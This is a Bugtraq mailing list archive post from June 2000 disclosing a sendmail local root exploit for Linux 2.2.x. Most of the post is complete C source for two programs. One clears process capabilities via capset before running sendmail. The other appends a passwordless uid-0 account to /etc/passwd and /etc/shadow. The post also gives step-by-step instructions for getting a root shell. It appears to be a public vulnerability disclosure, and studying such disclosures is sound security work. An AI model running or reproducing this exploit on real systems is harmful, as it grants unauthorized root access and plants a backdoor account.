Bugtraq mailing list archives
Sendmail local root exploit on linux 2.2.x
From: sky () REAL-LINUX DE (Florian Heinz)
Date: Thu, 8 Jun 2000 14:21:48 +0200
Hello all, Attached is a file with 2 sources, ex.c and add.c compile these 2 and create a file "mail": From: yomama () foobar com To: localuser () localdomain com Subject: foo bar . then create a .forward with: |/path/to/add then just do: ./ex < mail this should add a user yomama with uid/gid = 0 and without a password set a simple su - yomama should give you root. This exploit was written by me in a hurry, I hope there are no mistakes Greets Florian Heinz -- snip -- ex.c -- #include <linux/capability.h> int main (void) { cap_user_header_t header; cap_user_data_t data; header = malloc(8); data = malloc(12); header->pid = 0; header->version = _LINUX_CAPABILITY_VERSION; data->inheritable = data->effective = data->permitted = 0; capset(header, data); execlp("/usr/sbin/sendmail", "sendmail", "-t", NULL); } -- snap -- ex.c -- -- snip -- add.c -- #include <fcntl.h> int main (void) { int fd; char string[40]; seteuid(0); fd = open("/etc/passwd", O_APPEND|O_WRONLY); strcpy(string, "yomama:x:0:0::/root:/bin/sh\n"); write(fd, string, strlen(string)); close(fd); fd = open("/etc/shadow", O_APPEND|O_WRONLY); strcpy(string, "yomama::11029:0:99999:7:::"); write(fd, string, strlen(string)); close(fd); } -- snap -- add.c --
Current thread:
- Sendmail local root exploit on linux 2.2.x Florian Heinz (Jun 08)
- Snort 1.6 and nmap 2.54beta1 Galileo (May 12)
- Re: Snort 1.6 and nmap 2.54beta1 Simple Nomad (Jun 14)
- Security Advisory: REMOTE ROOT VULNERABILITY IN GSSFTP DAEMON Tom Yu (Jun 14)
- Security Advisory: local ROOT exploit in BRU Technical Support (Jun 14)
- Re: Snort 1.6 and nmap 2.54beta1 Martin Roesch (Jun 14)
- Re: Sendmail local root exploit on linux 2.2.x Mark K. Pettit (Jun 08)
- Reporting Security Issues to Microsoft Microsoft Security Response Center (Jun 08)
- Re: Sendmail local root exploit on linux 2.2.x Christophe GRENIER (Jun 08)
- arprelay: a tool to edit TCP connections in a LAN Felix von Leitner (Jun 09)
- Re: Sendmail local root exploit on linux 2.2.x Alan Iwi (Jun 12)
(Thread continues...)
- Snort 1.6 and nmap 2.54beta1 Galileo (May 12)